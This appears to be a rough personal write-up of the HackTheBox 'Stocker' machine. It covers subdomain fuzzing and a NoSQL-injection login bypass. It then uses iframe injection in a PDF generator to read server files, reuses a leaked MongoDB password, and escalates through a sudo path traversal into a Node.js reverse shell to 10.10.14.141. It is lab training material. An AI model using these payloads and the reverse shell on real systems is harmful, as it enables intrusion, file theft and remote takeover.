CTF inject

CTFHackTheBox

/etc/hosts

nmap

1
nmap -sV -vvv -p- stocker.htb -sC

stocker.htb website

http://stocker.htb

Names

Angoose Garden

Subdomain

1
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.stocker.htb" -u http://stocker.htb -fs 178

Output:

1
2
[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 76ms]
    * FUZZ: dev

Add it to /etc/hosts

feroxbuster

stocker.htb

1
feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://stocker.htb

Nothing interesting.

dev.stocker.htb

1
feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.stocker.htb

dev.stocker.htb website

We can’t determine if the user is valid or not.

Wappalyser


Interesting things:

  • Hugo 0.84
  • Express


It’s always the same cookie:

1
s%3AEkbF_uqspuca0DfXERWTzsf0cWG94GB0.2PuvtFQYtitfWmH51fsrOd8Mx86P0IoPxyRVhB6A41o

Google: connect.sid
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/nodejs-express

1
npm i @digital-interruption/cookie-monster

I’ve lost lost of times on this one, it’s not working.
I’ve tried admin, stocker, Garden, Angoose. Maybe that’s not what I should do.

1
./cookie-monster.js --cookie s%3AEkbF_uqspuca0DfXERWTzsf0cWG94GB0 --signature 2PuvtFQYtitfWmH51fsrOd8Mx86P0IoPxyRVhB6A41o -w /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

Let’s go back to the website.

Bypass login page

https://book.hacktricks.xyz/pentesting-web/login-bypass

it’s accepting the json:

it’s not working.
https://book.hacktricks.xyz/pentesting-web/nosql-injection

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /login HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 53
Origin: http://dev.stocker.htb
Connection: close
Referer: http://dev.stocker.htb/login
Cookie: connect.sid=s%3AEkbF_uqspuca0DfXERWTzsf0cWG94GB0.2PuvtFQYtitfWmH51fsrOd8Mx86P0IoPxyRVhB6A41o
Upgrade-Insecure-Requests: 1

{"username":{"$ne": null},"password":{"$ne": null}}


It’s working with a nosql injection.
Now If I add something to my basket I can generate a PDF.

I’m too tired to continue, I will do it tommorow.

manipulate the PDF

We can see the infos in json with burpsuit.

So, we can manipulate the PDF with 3 values:

  • title
  • price
  • amount
    The PDF is created by Skia/PDF m108

Found something but it’s not working well, maybe I use it wrong:
https://github.com/ziadanbari2021/exploit-CVE-2020-24815
Let’s see the code to do it ourself.

file it the file we want to read.

1
"title":"<iframe src=file:////{}>".format(file)

Then he download the PDF:

And convert it into text:

So this is my request.
And this is my PDF:

Even with pdftotext it’s not perfect:

I need to know the exact file I should read, we don’t know any users, but maybe we can read config files with creds, or modify the pyaload to execute an RCE.

I found something to get a better view:

1
"title":"<iframe width='1000' height='1000' src=file://///etc/passwd>",

User

1
2
_laurel
angoose

Config file with creds

They use mongodb and express
I don’t really know what to search, I’m blind and slow. I have to fuzz it.
I will see it the file exist when the len of the pdf if bigger than Content-Length: 31133
Whit this:

1
curl -I http://dev.stocker.htb/api/po/64304da8da348e3d8cd8fe5b

Now to generate the PDF I will use this:

1
2
3
4
5
curl -i -s -k -X $'POST' \                                                                                                                                                                       
    -H $'Host: dev.stocker.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://dev.stocker.htb/stock' -H $'Content-Type: application/json' -H $'Content-Length: 242' -H $'Origin: http://dev.stocker.htb' -H $'Connection: close' \
    -b $'connect.sid=s%3Ahpp9xtDJh-22qPPIQMzkqYz472TQw5vR.IgUuc96nI2Df8%2BBOvwXUpYzNAT1Nuyc1yU%2FhRsFH9jI' \
    --data-binary $'{\"basket\":[{\"_id\":\"638f116eeb060210cbd83a93\",\"title\":\"<iframe width=\'1000\' height=\'1000\' src=file://///etc/nginx/nginx.conf>\",\"description\":\"It\'s toilet paper.\",\"image\":\"toilet-paper.jpg\",\"price\":0.69,\"currentStock\":4212,\"__v\":0,\"amount\":1}]}' \
    $'http://dev.stocker.htb/api/order' | tail +10 | cut -d \" -f 6

Ok, Ive done the fuzzer, he’s slower than me, seriously…
I need to run every curl commands in backgroud to be faster.

I will just continue by hand:
it was a bad idea to read this file :/var/log/nginx/access.log

/etc/nginx/nginx.conf
I need to see more !

You just have to change the value of this:

1
"title":"<iframe width='1000' height='2000' src=file:////etc/nginx/nginx.conf >",

But I have Internal Server Error each time so I need to decrease the size.

We lhave the web directory, we need a file:
https://blog.logrocket.com/creating-configuration-files-node-js-using-node-config/

Node-config supports many file extensions. At the time of publication, the current version of node-config (3.3.6) supports the following extensions:

  • .json
  • .json5
  • .hjson
  • .yaml or .yml
  • .coffee
  • .js
  • .cson
  • .properties
  • .toml
  • .ts
  • .xml

/var/www/dev/index.js is present.

1
2
// TODO: Configure loading from dotenv for production  
const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";

We have one password: IHeardPassphrasesArePrettySecure
It’s the password of angoose.

We don’t have the rights on the files.

The * mean everything, it need to be a JS file.
So instead of puting a file I can put an another directory.

1
sudo node /usr/local/scripts/../../../../../tmp/rs.js

In /tmp/rs.js
https://www.revshells.com/

1
2
3
4
5
6
7
8
9
10
11
12
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("sh", []);
    var client = new net.Socket();
    client.connect(4949, "10.10.14.141", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();